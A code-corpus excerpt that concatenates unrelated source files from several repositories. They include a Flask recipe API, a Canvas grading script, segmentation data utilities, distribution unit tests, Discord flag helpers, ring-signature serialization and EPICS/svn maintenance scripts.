Retrives a list of the recipes for the category
:param int category_id: The id of the category whose recipes to be displayed\n
:return str status: The status of the request (Success, Fail)\n
:return list recipes: The recipes in the category
"""
if not current_user:
return is_unauthorized()
category = current_user.categories.filter_by(id=category_id).first()
if category:
recipes = category.recipes.all()
if not recipes:
response_payload = dict(
message='No recipes added to this category yet!'
)
response_payload = jsonify(response_payload)
return make_response(response_payload, 404)
# search and/or paginate
args = parser.parse(SEARCH_PAGE_ARGS, request)
if 'q' in args:
try:
recipes = current_user.recipes.filter(
Recipe.name.ilike("%" + args['q'] + "%"),
Recipe.category_id == category.id
).paginate(page=args['page'], per_page=args['per_page'], error_out=False)
except KeyError:
recipes = current_user.recipes.filter(
Recipe.name.ilike("%" + args['q'] + "%"),
Recipe.category_id == category.id
).paginate(page=1, per_page=5)
else:
recipes = category.recipes.paginate(per_page=2)
base_url = request.base_url
if 'q' in args:
pagination_details = _pagination(recipes, base_url, q=args['q'])
else:
pagination_details = _pagination(recipes, base_url)
user_recipes = []
for current_recipe in recipes.items:
this_recipe = make_payload(recipe=current_recipe)
user_recipes.append(this_recipe)
if user_recipes:
response_payload = {
"recipes": user_recipes,
"page_details": pagination_details
}
return make_response(jsonify(response_payload), 200)
response_payload = {
"message": "Recipe does not exist."
}
return make_response(jsonify(response_payload), 400)
response_payload = dict(
message='Invalid category!'
)
response_payload = jsonify(response_payload)
return make_response(response_payload, 400)
@recipes_ns.route('/<int:recipe_id>')
class SingleRecipeHandler(Resource):
"""
This resource defines the single recipe handler endpoints
It contains the READ, UPDATE and DELETE functionality
"""
@authorization_required
def get(current_user, self, category_id, recipe_id):
"""
This returns a specific recipe from the specified category
:param int category_id: The integer Id of the category\n
:param int recipe_id: The integer Id of the recipe to be retrieved\n
:returns json response: An appropriate response depending on the request
"""
if not current_user:
return is_unauthorized()
category = current_user.categories.filter_by(id=category_id).first()
if category:
selected_recipe = category.recipes.filter_by(id=recipe_id).first()
# When the recipe requested does not exist
if not selected_recipe:
return _does_not_exist()
# Return the recipe
response_payload = {
"recipes": [make_payload(recipe=selected_recipe)]
}
response_payload = jsonify(response_payload)
return make_response(response_payload, 200)
# When an invalid category id is provided
response_payload = dict(
message='Category does not exist!'
)
response_payload = jsonify(response_payload)
return make_response(response_payload, 404)
@authorization_required
@API.expect(recipe)
def put(current_user, self, category_id, recipe_id):
"""
        This updates a specific recipe in the specified category
        :param int category_id: The integer Id of the category\n
        :param int recipe_id: The integer Id of the recipe to be updated\n
:returns json response: An appropriate response depending on the request
"""
if not current_user:
return is_unauthorized()
category = current_user.categories.filter_by(id=category_id).first()
if category:
selected_recipe = category.recipes.filter_by(id=recipe_id).first()
# When the recipe requested does not exist
if not selected_recipe:
return _does_not_exist()
# Get request data
request_payload = request.get_json()
new_recipe_name = _clean_name(request_payload['name'])
# Check if name provided is of an existing recipe
existing_recipe = current_user.recipes.filter(
Recipe.name == new_recipe_name,
Recipe.id != selected_recipe.id
).first()
if not existing_recipe:
if new_recipe_name != selected_recipe.name:
old_recipe_name = selected_recipe.name
# Update recipe
selected_recipe.name = new_recipe_name
selected_recipe.ingredients = request_payload['ingredients']
selected_recipe.description = request_payload['description']
db.session.commit()
# Return appropriate message saying the recipe was updated
response_payload = {
"message": "Recipe '{}' was successfully updated to '{}'.".format(
old_recipe_name, new_recipe_name
)
}
else:
selected_recipe.ingredients = request_payload['ingredients']
selected_recipe.description = request_payload['description']
db.session.commit()
# Return appropriate message saying the recipe was updated
response_payload = {
"message": "Recipe '{}' was successfully updated.".format(
selected_recipe.name
),
"recipe": make_payload(recipe=selected_recipe)
}
response_payload = jsonify(response_payload)
return make_response(response_payload, 200)
# When an invalid category id is provided
response_payload = dict(
message='Category does not exist!'
)
response_payload = jsonify(response_payload)
return make_response(response_payload, 404)
@authorization_required
def delete(current_user, self, category_id, recipe_id):
"""
        This deletes a specific recipe from the specified category
        :param int category_id: The integer Id of the category\n
        :param int recipe_id: The integer Id of the recipe to be deleted\n
:returns json response: An appropriate response depending on the request
"""
if not current_user:
return is_unauthorized()
category = current_user.categories.filter_by(id=category_id).first()
if category:
selected_recipe = category.recipes.filter_by(id=recipe_id).first()
# When the recipe requested does not exist
if not selected_recipe:
return _does_not_exist()
name = selected_recipe.name
# Delete the selected recipe
db.session.delete(selected_recipe)
db.session.commit()
# Render response
response_payload = {
"message": "Recipe " + name + " was deleted successfully!"
}
response_payload = jsonify(response_payload)
return make_response(response_payload, 200)
# When an invalid category id is provided
response_payload = dict(
message='Category does not exist!'
)
response_payload = jsonify(response_payload)
return make_response(response_payload, 404)
```
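For reference, a minimal client sketch against these endpoints. The base URL, category id, and the exact shape of the Authorization header are assumptions — the namespace prefix and the `authorization_required` decorator that determine them are defined elsewhere in the project:
```python
# Hypothetical client sketch; base URL and auth header name are assumptions.
import requests

BASE = "http://localhost:5000/api/v1"
HEADERS = {"Authorization": "Bearer <access-token>"}  # header name assumed

# Create a recipe in category 1 (fields match the POST handler above)
payload = {
    "name": "guacamole",
    "ingredients": "avocado, lime, salt",
    "description": "Mash and mix.",
}
resp = requests.post(BASE + "/categories/1/recipes", json=payload, headers=HEADERS)
print(resp.status_code, resp.json())

# Search the category's recipes with pagination (matches the GET handler)
resp = requests.get(
    BASE + "/categories/1/recipes",
    params={"q": "guac", "page": 1, "per_page": 5},
    headers=HEADERS,
)
print(resp.json())
```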
#### File: yummy-rest/app/__init__.py
```python
import os
from flask import Flask, make_response, jsonify, redirect
from flask_sqlalchemy import SQLAlchemy
from flask_cors import CORS
# Linting exception
# pylint: disable=C0103
# pylint: disable=C0413
# local import
from instance.config import app_config
# initialize sql-alchemy
db = SQLAlchemy()
# Get the instance config to use
config_name = os.environ.get("APP_CONFIG", "production")
APP = Flask(__name__, instance_relative_config=True)
APP.config.from_object(app_config[config_name])
# override the 404 error handler
@APP.errorhandler(404)
def resource_not_found(error):
"""
    This is the response returned if the user attempts to access
    a non-existent resource or URL.
"""
response_payload = dict(
message="The requested URL was not found on the server. " + \
"If you entered the URL manually please check your spelling and try again."
)
return make_response(jsonify(response_payload), 404)
@APP.route('/', methods=['GET'])
def redirect_to_docs():
"""
Redirects root to API docs
"""
return redirect('/api/v1/docs')
db.init_app(APP)
# Import and add namespaces for the endpoints
from app.restplus import API
from app.endpoints.auth import auth_ns
from app.endpoints.categories import categories_ns
from app.endpoints.recipes import recipes_ns
API.add_namespace(auth_ns)
API.add_namespace(categories_ns)
API.add_namespace(recipes_ns)
API.init_app(APP)
CORS(APP)
``` |
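A minimal launcher sketch for running the app locally; it assumes `APP_CONFIG` and `instance/config.py` are set up as the module above expects, and the host/port are illustrative:
```python
# run.py — hypothetical entry point; host and port are illustrative
from app import APP

if __name__ == "__main__":
    APP.run(host="127.0.0.1", port=5000)
```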
{
"source": "a2975667/canvas_grader",
"score": 2
} |
#### File: canvas_grader/src/grading.py
```python
import csv
import logging
from os.path import exists
from tqdm import tqdm
from src.canvas_wrapper import (fetch_student_id_mapping, get_all_submissions,
get_student_mapping, upload_grade_with_comment)
def grader_initialization(course, assignment_id):
logging.warning('Retrieving user information...')
users = course.get_users(enrollment_type=['student'])
logging.warning('Checking student metadata...')
if not exists('metadata/canvas.student.csv'):
logging.warning('No metadata found, creating one...')
fetch_student_id_mapping(users)
logging.warning('Retrieving all submissions...')
assignment = course.get_assignment(assignment_id)
submissions = get_all_submissions(users, course, assignment)
return submissions
def grade_upload(submissions, gradebook):
# create student - canvas ID mapping
logging.warning('Building student index...')
students, reversed_student = get_student_mapping(
filename='metadata/canvas.student.csv')
# read in grading data
logging.warning('Reading grade information...')
input_grade = {}
gb = csv.reader(open(gradebook))
next(gb, None)
for entry in gb:
if entry[0] not in students:
logging.warning(entry[0] + ' is not on canvas.')
continue
if entry[1].strip() == "":
logging.warning(entry[0] + ' does not have a (valid) score. Assuming 0.')
entry[1] = '0'
try:
input_grade[students[entry[0]]] = {
"netid": entry[0],
"grade": float(entry[1].strip()),
"comments": entry[2].strip().replace('$$$', ',')
}
        except Exception:
logging.critical('Something critical happened for ' +
entry[0] + ': the entry is: ' + str(entry))
# writing to canvas
logging.warning('Pushing updates to canvas...')
for _, submission in tqdm(submissions.items()):
canvas_id = str(submission.user_id)
if canvas_id in input_grade:
record = input_grade[canvas_id]
upload_grade_with_comment(
submission, record['grade'], record['comments'])
else:
logging.warning('Cannot find grade for: ' +
reversed_student[canvas_id])
upload_grade_with_comment(
submission, 0, ' cannot find submission.')
logging.warning('Done.')
``` |
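A hedged driver sketch tying the two functions together. The `Canvas` object comes from the `canvasapi` package; the URL, token, and ids below are placeholders, and the gradebook CSV is assumed to have `netid,score,comments` rows (with `$$$` standing in for commas inside comments), which is what `grade_upload` parses:
```python
# Hypothetical driver; URL, token, and ids are placeholders.
from canvasapi import Canvas
from src.grading import grader_initialization, grade_upload

canvas = Canvas("https://canvas.example.edu", "<api-token>")
course = canvas.get_course(12345)

submissions = grader_initialization(course, assignment_id=67890)
grade_upload(submissions, gradebook="grades.csv")
```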
{
"source": "a2975667/zoomAttendance",
"score": 3
} |
#### File: a2975667/zoomAttendance/helper.py
```python
def is_int(text: str):
try:
int(text)
except ValueError:
return False
return True
``` |
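Usage follows `int()` semantics, so surrounding whitespace parses but decimal strings do not:
```python
assert is_int("42")
assert is_int(" 7 ")      # int() tolerates surrounding whitespace
assert not is_int("4.2")  # decimals do not parse as int
assert not is_int("abc")
```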
{
"source": "A2Amir/How-to-make-a-python-package-and-upload-it-to-pypi-",
"score": 3
} |
#### File: How-to-make-a-python-package-and-upload-it-to-pypi-/Package Unit Tests/test.py
```python
import unittest
from Gaussiandistribution import Gaussian
from Binomialdistribution import Binomial
class TestGaussianClass(unittest.TestCase):
def setUp(self):
self.gaussian = Gaussian(25, 2)
self.gaussian.read_data_file('numbers.txt')
def test_initialization(self):
self.assertEqual(self.gaussian.mean, 25, 'incorrect mean')
self.assertEqual(self.gaussian.stdev, 2, 'incorrect standard deviation')
def test_readdata(self):
self.assertEqual(self.gaussian.data,\
[1, 3, 99, 100, 120, 32, 330, 23, 76, 44, 31], 'data not read in correctly')
def test_meancalculation(self):
self.assertEqual(self.gaussian.calculate_mean(),\
sum(self.gaussian.data) / float(len(self.gaussian.data)), 'calculated mean not as expected')
def test_stdevcalculation(self):
self.assertEqual(round(self.gaussian.calculate_stdev(), 2), 92.87, 'sample standard deviation incorrect')
self.assertEqual(round(self.gaussian.calculate_stdev(0), 2), 88.55, 'population standard deviation incorrect')
def test_pdf(self):
self.assertEqual(round(self.gaussian.pdf(25), 5), 0.19947,\
'pdf function does not give expected result')
self.gaussian.calculate_mean()
self.gaussian.calculate_stdev()
self.assertEqual(round(self.gaussian.pdf(75), 5), 0.00429,\
'pdf function after calculating mean and stdev does not give expected result')
def test_add(self):
gaussian_one = Gaussian(25, 3)
gaussian_two = Gaussian(30, 4)
gaussian_sum = gaussian_one + gaussian_two
self.assertEqual(gaussian_sum.mean, 55)
self.assertEqual(gaussian_sum.stdev, 5)
class TestBinomialClass(unittest.TestCase):
def setUp(self):
self.binomial = Binomial(0.4, 20)
self.binomial.read_data_file('numbers_binomial.txt')
def test_initialization(self):
self.assertEqual(self.binomial.p, 0.4, 'p value incorrect')
self.assertEqual(self.binomial.n, 20, 'n value incorrect')
def test_readdata(self):
self.assertEqual(self.binomial.data,\
[0, 1, 1, 1, 1, 1, 0, 1, 0, 1, 0, 1, 0], 'data not read in correctly')
def test_calculatemean(self):
mean = self.binomial.calculate_mean()
self.assertEqual(mean, 8)
def test_calculatestdev(self):
stdev = self.binomial.calculate_stdev()
self.assertEqual(round(stdev,2), 2.19)
def test_replace_stats_with_data(self):
p, n = self.binomial.replace_stats_with_data()
self.assertEqual(round(p,3), .615)
self.assertEqual(n, 13)
def test_pdf(self):
self.assertEqual(round(self.binomial.pdf(5), 5), 0.07465)
self.assertEqual(round(self.binomial.pdf(3), 5), 0.01235)
self.binomial.replace_stats_with_data()
self.assertEqual(round(self.binomial.pdf(5), 5), 0.05439)
self.assertEqual(round(self.binomial.pdf(3), 5), 0.00472)
def test_add(self):
binomial_one = Binomial(.4, 20)
binomial_two = Binomial(.4, 60)
binomial_sum = binomial_one + binomial_two
self.assertEqual(binomial_sum.p, .4)
self.assertEqual(binomial_sum.n, 80)
if __name__ == '__main__':
unittest.main()
``` |
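The tests double as documentation for the distribution classes. A short sketch of the API they exercise (the implementations live in `Gaussiandistribution.py` and `Binomialdistribution.py`, which are not shown here):
```python
from Gaussiandistribution import Gaussian
from Binomialdistribution import Binomial

# Adding Gaussians: means add, standard deviations add in quadrature
g = Gaussian(25, 3) + Gaussian(30, 4)
print(g.mean, g.stdev)  # 55 and 5

# Binomial parameters can be re-derived from a file of 0/1 outcomes
b = Binomial(0.4, 20)
b.read_data_file('numbers_binomial.txt')
p, n = b.replace_stats_with_data()
print(round(b.pdf(5), 5))
```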
{
"source": "A2Amir/Prostate-Segmentation",
"score": 3
} |
#### File: A2Amir/Prostate-Segmentation/utils.py
```python
import os
import cv2
import numpy as np
import matplotlib.pyplot as plt
import glob
import nibabel as nib
import nrrd
import tensorflow as tf
def get_imgs_labels_paths(PATH):
dataset_path = {}
imgs_path =[]
labls_path = []
number_images = []
for patient in os.listdir(PATH):
# to check if the patient folder name ends with a digit
if patient.split('/')[-1].isdigit():
for technic in os.listdir(os.path.join(PATH, patient)):
if technic in ['ADC','DWI', 'T2W']:
images_path = sorted(glob.glob(os.path.join(PATH, patient, technic)+'/*.nii'))
imgs_path.append(images_path)
number_images.append(len(images_path))
elif technic in ['label']:
labels_path = sorted(glob.glob(os.path.join(PATH, patient, technic)+'/*.nrrd'))
labls_path.append(labels_path)
else:
print('there is another folder named: ', PATH, patient, technic)
number_images.append(len(labels_path))
dataset_path[os.path.join(PATH, patient)] = [imgs_path, labels_path, number_images]
imgs_path =[]
labls_path =[]
number_images = []
return dataset_path
def read_label(img_path, resize_shape , num_classes):
readdata, header = nrrd.read(img_path)
label = cv2.resize( readdata, resize_shape)
label = label.astype(np.uint8)
label = tf.one_hot(tf.squeeze(label), depth= num_classes)
label = label.numpy().astype(np.uint8)
#print(img_path, 'label shape', label.shape)
return label
def read_image(path, resize_shape):
image = nib.load(path)
image = np.array(image.dataobj)
image = image.astype(float)
image = cv2.resize( image, resize_shape )
image = cv2.normalize(image, None, alpha = 0, beta = 255, norm_type = cv2.NORM_MINMAX, dtype = cv2.CV_32F)
#print(path, 'image shape', image.shape)
return image
def read_imgs_labels(dataset_paths, resize_shape, num_classes):
x_train = []
y_train = []
for k , i in dataset_paths.items():
#print(k)
#print()
image_paths = i[0]
label_path = i[1]
number_paths = i[2]
assert all([1 == num for num in number_paths])
for a, d, t, l in zip(image_paths[0], image_paths[1], image_paths[2],label_path ):
img_adc = read_image(a, resize_shape)
img_dwi = read_image(d, resize_shape)
img_t2w = read_image(t, resize_shape)
label_img = read_label(l, resize_shape , num_classes)
assert img_adc.shape == img_dwi.shape == img_t2w.shape == label_img.shape[:3]
for ch in range(img_adc.shape[2]):
x_train.append(np.stack([img_adc[:,:,ch],img_dwi[:,:,ch],img_t2w[:,:,ch]], axis=2))
y_train.append(label_img[:,:,ch,:])
#print('--------------------------------------------------------------')
x_train = np.stack((x_train))
y_train = np.stack((y_train))
return x_train, y_train
@tf.function()
def preparation(image, label , center_crop_rate=0.7, input_shape=(256, 256) ):
image = tf.image.central_crop(image, center_crop_rate)
label = tf.image.central_crop(label, center_crop_rate)
image = tf.image.resize(image, input_shape, method='bilinear')
label = tf.image.resize(label, input_shape, method='bilinear')
image = tf.cast(image, dtype= tf.float32)
label = tf.cast(label, dtype= tf.float32 )
return image, label
@tf.function()
def normalize(image, label):
    # standardize each image to zero mean and unit variance
image = tf.image.per_image_standardization(image)
#image = (image / 127.5) - 1
return image, label
@tf.function()
def random_augmentation(image, label):
if tf.random.uniform(()) > 0.5:
image = tf.image.rot90(image, k=1, name=None)
label = tf.image.rot90(label, k=1, name=None)
if tf.random.uniform(()) > 0.5:
image = tf.image.rot90(image, k=3, name=None)
label = tf.image.rot90(label, k=3, name=None)
if tf.random.uniform(()) > 0.5:
# random mirroring
image = tf.image.flip_left_right(image)
label = tf.image.flip_left_right(label)
return image, label
@tf.function()
def load_image_train(image_file, label_file, input_shape):
image, label= preparation(image_file, label_file, center_crop_rate=0.7, input_shape=input_shape)
image, label = random_augmentation(image, label)
image, label = normalize(image, label)
return image, label
@tf.function()
def load_image_test(image_file, label_file, input_shape):
image, label= preparation(image_file, label_file, center_crop_rate=0.7, input_shape=input_shape)
#image, label = random_augmentation(image, label)
image, label = normalize(image, label)
return image, label
def create_train_test_dataset(x_train, y_train, number_test_image, buffer_size, batch_size, input_shape):
x_test, y_test = x_train[:number_test_image,:,:,], y_train[:number_test_image,:,:,]
x_train, y_train = x_train[number_test_image:,:,:,], y_train[number_test_image:,:,:,]
train_dataset = tf.data.Dataset.from_tensor_slices((x_train, y_train))
train_dataset = train_dataset.map(lambda x, y: load_image_train(x, y, input_shape) , num_parallel_calls=tf.data.AUTOTUNE)
train_dataset = train_dataset.shuffle(buffer_size)
train_dataset = train_dataset.batch(batch_size)
test_dataset = tf.data.Dataset.from_tensor_slices((x_test, y_test))
test_dataset = test_dataset.map(lambda x, y: load_image_test(x, y, input_shape) , num_parallel_calls=tf.data.AUTOTUNE)
test_dataset = test_dataset.batch(batch_size)
return train_dataset, test_dataset
def show_img(img,label, n_classes):
img = img[0,:,:,:]
label = label[0,:,:,:]
plt.imshow(img)
fig, axs = plt.subplots(1,n_classes, figsize=(15, 6), facecolor='w', edgecolor='k')
axs = axs.ravel()
for i in range(n_classes):
axs[i].imshow(label[:,:,i])
        axs[i].set_title('Ground Truth of Channel ' + str(i))
print('Unique numbers in channel {} are {},{}'.format(i, np.min(np.unique(label[:, :, i])),
np.max(np.unique(label[:, :, i]))))
plt.show()
``` |
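A hedged end-to-end sketch of how these helpers compose. The data root, class count, and shapes below are placeholders; the directory layout (numeric per-patient folders containing ADC/DWI/T2W/label subfolders) is the one `get_imgs_labels_paths` walks:
```python
# Placeholder paths and hyperparameters.
PATH = './data/'            # contains numeric patient folders
NUM_CLASSES = 3             # assumed number of segmentation classes
RESIZE_SHAPE = (128, 128)   # in-plane size used when reading volumes
INPUT_SHAPE = (256, 256)    # network input size after crop + resize

paths = get_imgs_labels_paths(PATH)
x, y = read_imgs_labels(paths, RESIZE_SHAPE, NUM_CLASSES)
train_ds, test_ds = create_train_test_dataset(
    x, y, number_test_image=20, buffer_size=256,
    batch_size=8, input_shape=INPUT_SHAPE)

for images, labels in train_ds.take(1):
    show_img(images.numpy(), labels.numpy(), NUM_CLASSES)
```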
{
"source": "a2br/Noodles",
"score": 3
} |
#### File: Noodles/utils/flags.py
```python
class flag_value:
def __init__(self, func):
self.flag = func(None)
self.__doc__ = func.__doc__
def __get__(self, instance, owner):
return instance._has_flag(self.flag)
class UserFlags:
def __init__(self, value: int = 0):
self.value = value
def __repr__(self):
return '<%s value=%s>' % (self.__class__.__name__, self.value)
def __iter__(self):
for name, value in self.__class__.__dict__.items():
if isinstance(value, flag_value) and self._has_flag(value.flag):
yield name
def _has_flag(self, o):
return (self.value & o) == o
@flag_value
def discord_employee(self):
return 1 << 0
@flag_value
def discord_partner(self):
return 1 << 1
@flag_value
def hs_events(self):
return 1 << 2
@flag_value
def bug_hunter_lvl1(self):
return 1 << 3
@flag_value
def mfa_sms(self):
return 1 << 4
@flag_value
def premium_promo_dismissed(self):
return 1 << 5
@flag_value
def hs_bravery(self):
return 1 << 6
@flag_value
def hs_brilliance(self):
return 1 << 7
@flag_value
def hs_balance(self):
return 1 << 8
@flag_value
def early_supporter(self):
return 1 << 9
@flag_value
def team_user(self):
return 1 << 10
@flag_value
def system(self):
return 1 << 12
@flag_value
def unread_sys_msg(self):
return 1 << 13
@flag_value
def bug_hunter_lvl2(self):
return 1 << 14
@flag_value
def underage_deleted(self):
return 1 << 15
@flag_value
def verified_bot(self):
return 1 << 16
@flag_value
def verified_dev(self):
return 1 << 17
``` |
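The `flag_value` descriptor turns each method into a read-only boolean property, and `__iter__` yields the names of every set flag. A quick usage sketch:
```python
# Bit 1 (partner) and bit 9 (early supporter) set
flags = UserFlags((1 << 1) | (1 << 9))

print(flags.discord_partner)  # True
print(flags.hs_bravery)       # False
print(list(flags))            # ['discord_partner', 'early_supporter']
```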
{
"source": "a2br/pyring",
"score": 2
} |
#### File: pyring/pyring/serialize.py
```python
import base64
import string
import textwrap
import uuid
import pyasn1.codec.der.encoder
import pyasn1.codec.der.decoder
import pyasn1.codec.native.decoder
from pyasn1.type.namedtype import NamedType, NamedTypes
from pyasn1.type.univ import Sequence, SequenceOf, OctetString, ObjectIdentifier
from .ge import Point
from .sc25519 import Scalar
from .one_time import RingSignature
_PEM_OPENING = "-----BEGIN RING SIGNATURE-----"
_PEM_CLOSING = "-----END RING SIGNATURE-----"
_UUID = uuid.UUID(hex="3b5e61af-c4ec-496e-95e9-4b64bccdc809")
_OBJECT_ID = (2, 25) + tuple(_UUID.bytes)
class RingSignatureSchema(Sequence):
"""An ASN.1 schema for ring signatures.
Ring signatures are identified with an object ID following Recommendation
ITU-T X.667. The UUID4 used is 3b5e61af-c4ec-496e-95e9-4b64bccdc809.
"""
componentType = NamedTypes(
NamedType("algorithm", ObjectIdentifier(value=_OBJECT_ID)),
NamedType("key_image", OctetString()),
NamedType("public_keys", SequenceOf(componentType=OctetString())),
NamedType("c", SequenceOf(componentType=OctetString())),
NamedType("r", SequenceOf(componentType=OctetString())),
)
def export_pem(ring_signature: RingSignature) -> str:
"""Export the ring signature to a PEM file."""
der = pyasn1.codec.der.encoder.encode(
pyasn1.codec.native.decoder.decode(
{
"key_image": bytes(ring_signature.key_image.data),
"public_keys": [
bytes(public_key.data) for public_key in ring_signature.public_keys
],
"r": [bytes(r.data) for r in ring_signature.r],
"c": [bytes(c.data) for c in ring_signature.c],
},
asn1Spec=RingSignatureSchema(),
)
)
der_base64 = "\n".join(textwrap.wrap(base64.b64encode(der).decode("ascii"), 64))
return f"{_PEM_OPENING}\n{der_base64}\n{_PEM_CLOSING}"
def import_pem(signature: str) -> RingSignature:
signature = signature.strip()
if not signature.startswith(_PEM_OPENING) or not signature.endswith(_PEM_CLOSING):
raise ValueError("invalid encapsulation")
# Strip opening/closing and remove whitespace
signature = signature[len(_PEM_OPENING) : -len(_PEM_CLOSING)]
signature = signature.translate({ord(c): None for c in string.whitespace})
# Decode from text to ASN.1 object
der = base64.b64decode(signature, validate=True)
asn1, remainder = pyasn1.codec.der.decoder.decode(der)
if remainder:
raise ValueError("unable to decode entire signature")
# Check if the object identifier is correct
if asn1["field-0"] != _OBJECT_ID:
raise ValueError("invalid object ID")
# Extract data
key_image = Point(asn1["field-1"])
public_keys = [Point(public_key) for public_key in asn1["field-2"]]
cs = [Scalar(c) for c in asn1["field-3"]]
rs = [Scalar(r) for r in asn1["field-4"]]
return RingSignature(public_keys, key_image, cs, rs)
``` |
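Round-tripping a signature through PEM is symmetric. A hedged sketch, assuming `signature` is a `RingSignature` produced elsewhere in the package (e.g. by the signing routine in `one_time`, not shown here):
```python
# `signature` is assumed to come from the package's signing code.
pem = export_pem(signature)
print(pem.splitlines()[0])  # -----BEGIN RING SIGNATURE-----

recovered = import_pem(pem)
assert bytes(recovered.key_image.data) == bytes(signature.key_image.data)
```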
{
"source": "A2-Collaboration/epics",
"score": 2
} |
#### File: iocAdmin/src/iocReleaseCreateDb.py
```python
import sys
import os
import subprocess
import optparse
__all__ = ['export_db_file', 'module_versions', 'process_options']
def export_db_file(module_versions, path=None):
"""
    Use the contents of a dictionary of module versions to create a database
    of stringin PVs holding module release strings. The database is written
    to stdout if path is not provided or is None.
"""
out_file = sys.stdout
idx = 0
idxMax = 20
if path:
try:
out_file = open(path, 'w')
except IOError, e:
sys.stderr.write('Could not open "%s": %s\n' % (path, e.strerror))
return None
sorted_module_versions = [(key, module_versions[key]) for key in sorted(module_versions.keys())]
print >> out_file, '#=============================================================================='
print >> out_file, '#'
print >> out_file, '# Abs: LCLS read-only stringin records for Modules specified in configure/RELEASE'
print >> out_file, '#'
print >> out_file, '# Name: iocRelease.db'
print >> out_file, '#'
print >> out_file, '# Note: generated automatically by $IOCADMIN/bin/$EPICS_HOST_ARCH/iocReleaseCreateDb.py'
print >> out_file, '#'
print >> out_file, '#=============================================================================='
for [key, module_version] in sorted_module_versions:
"""
strip off the _MODULE_VERSION from key for PV NAME
"""
x = key.replace("_MODULE_VERSION","",1)
if idx >= idxMax: break
print >> out_file, 'record(stringin, "$(IOC):RELEASE%02d") {' % idx
print >> out_file, ' field(DESC, "%s")' % x
print >> out_file, ' field(PINI, "YES")'
print >> out_file, ' field(VAL, "%s")' % module_version
print >> out_file, ' #field(ASG, "some read only grp")'
print >> out_file, '}'
idx = idx + 1
while idx < idxMax:
print >> out_file, 'record(stringin, "$(IOC):RELEASE%02d") {' % idx
print >> out_file, ' field(DESC, "Not Applicable")'
print >> out_file, ' field(PINI, "YES")'
print >> out_file, ' field(VAL, "Not Applicable")'
print >> out_file, ' #field(ASG, "some read only grp")'
print >> out_file, '}'
idx = idx + 1
if out_file != sys.stdout:
out_file.close()
def module_versions(release_path, site_path):
"""
Return a dictionary containing module names and versions.
"""
# first grab EPICS_BASE_VER from RELEASE_SITE file, if it's there
siteBaseVer = "Nada"
openSiteFile = 1
try:
site_file = open(site_path, 'r')
except IOError, e:
#sys.stderr.write('Could not open "%s": %s\n' % (site_path, e.strerror))
openSiteFile = 0
if openSiteFile:
for line in site_file:
# Remove comments
line = line.partition('#')[0]
# Turn 'a = b' into a key/value pair and remove leading and trailing whitespace
(key, sep, value) = line.partition('=')
key = key.strip()
value = value.strip()
# save EPICS_BASE_VER, if it's in there
if key.startswith('EPICS_BASE_VER'):
siteBaseVer = value
break
site_file.close()
# now get all the modules
try:
release_file = open(release_path, 'r')
except IOError, e:
sys.stderr.write('Could not open "%s": %s\n' % (release_path, e.strerror))
return None
release_file_dict = {}
for line in release_file:
# Remove comments
line = line.partition('#')[0]
# Turn 'a = b' into a key/value pair and remove leading and trailing whitespace
(key, sep, value) = line.partition('=')
key = key.strip()
value = value.strip()
# Add the key/value pair to the dictionary if the key ends with _MODULE_VERSION
if key.endswith('_MODULE_VERSION'):
# if BASE_MODULE_VERSION is set to EPICS_BASE_VER macro from RELEASE_SITE,
# capture it here
if key == "BASE_MODULE_VERSION" and value == "$(EPICS_BASE_VER)":
if siteBaseVer != "Nada":
release_file_dict[key] = siteBaseVer
else:
# don't set BASE at all
pass
else:
release_file_dict[key] = value
release_file.close()
return release_file_dict
def process_options(argv):
"""
Return parsed command-line options found in the list of
    arguments, `argv`, or ``sys.argv[1:]`` if `argv` is `None`.
"""
if argv is None:
argv = sys.argv[1:]
# usage = 'Usage: %prog RELEASE_FILE [options]'
usage = 'Usage: %prog RELEASE_FILE RELEASE_SITE_FILE [options]'
version = '%prog 0.1'
parser = optparse.OptionParser(usage=usage, version=version)
parser.add_option('-v', '--verbose', action='store_true', dest='verbose', help='print verbose output')
parser.add_option("-e", "--db_file", action="store", type="string", dest="db_file", metavar="FILE", help="module database file path")
parser.set_defaults(verbose=False,
db_file=None)
(options, args) = parser.parse_args(argv)
if len(args) != 2:
parser.error("incorrect number of arguments")
options.release_file_path = os.path.normcase(args[0])
options.release_site_file_path = os.path.normcase(args[1])
return options
def main(argv=None):
options = process_options(argv)
versions = module_versions(options.release_file_path, options.release_site_file_path)
export_db_file(versions, options.db_file)
return 0
if __name__ == '__main__':
status = main()
sys.exit(status)
```
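An invocation sketch for the script above (note this is Python 2 code, so it needs a Python 2 interpreter); the paths are placeholders for a real IOC's configure directory:
```python
# Equivalent to:
#   python iocReleaseCreateDb.py configure/RELEASE RELEASE_SITE --db_file iocRelease.db
status = main(["configure/RELEASE", "RELEASE_SITE", "--db_file", "iocRelease.db"])
```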
#### File: op/opi/convertMenu.py
```python
import sys
def main():
if len(sys.argv) < 2:
print "usage: convertMenu.py filename"
return
filename = sys.argv[1]
file = open(filename,"r+")
lines=file.readlines()
for i in range(len(lines)):
ix = lines[i].find("OPEN_DISPLAY")
if ix > 0:
print "found OPEN_DISPLAY:", lines[i]
found = False
            for j in range(i, min(i + 10, len(lines))):  # don't scan past EOF
ix = lines[j].find("<replace>false</replace>")
if ix > 0:
print "found <replace>false</replace>:", lines[j]
found = True
break
if found:
lines[i] = lines[i].replace("OPEN_DISPLAY", "OPEN_OPI_IN_VIEW")
lines[j] = lines[j].replace("<replace>false</replace>", "<Position>1</Position>")
i = j+1
file.seek(0)
file.writelines(lines)
if __name__ == "__main__":
main()
```
#### File: support/utils/logModuleFromTag.py
```python
usage = """
usage:
logModuleFromTag.py module [tag1 [tag2]]
If tag1 and tag2 are supplied:
do 'svn log -v' for 'module' from 'tag1' to 'tag2',
If tag2 is omitted:
use 'trunk' for tag2
If tag1 is omitted:
Use most recent tag for tag1
"""
import sys
import commands
SVN="https://subversion.xor.aps.anl.gov/synApps"
def tags(module, verbose=False):
"""
Return tags for a module in the synApps repository.
If verbose==False, return tags as a list; ['R1-0', 'R1-1']
else, return tags as a dictionary of dictionaries:
{'.': {'date': ('Mar', '30', '13:32'), 'rev': '10457', 'author': 'mooney'},
'R1-3': {'date': ('Mar', '30', '13:20'), 'rev': '10456', 'author': 'mooney'}}
"""
if verbose:
tagListRaw = commands.getoutput("svn ls -v %s/%s/tags" % (SVN,module)).split('\n')
tagDict = {}
for tag in tagListRaw:
(rev, author, month, day, year_time, tagName) = tag.split()
tagDict[tagName.strip('/')] = {'rev':rev, 'author':author, 'date':(month, day, year_time)}
return(tagDict)
else:
tagListRaw = commands.getoutput("svn ls %s/%s/tags" % (SVN,module)).split()
tagList = []
for tag in tagListRaw:
tagList.append(tag.strip('/'))
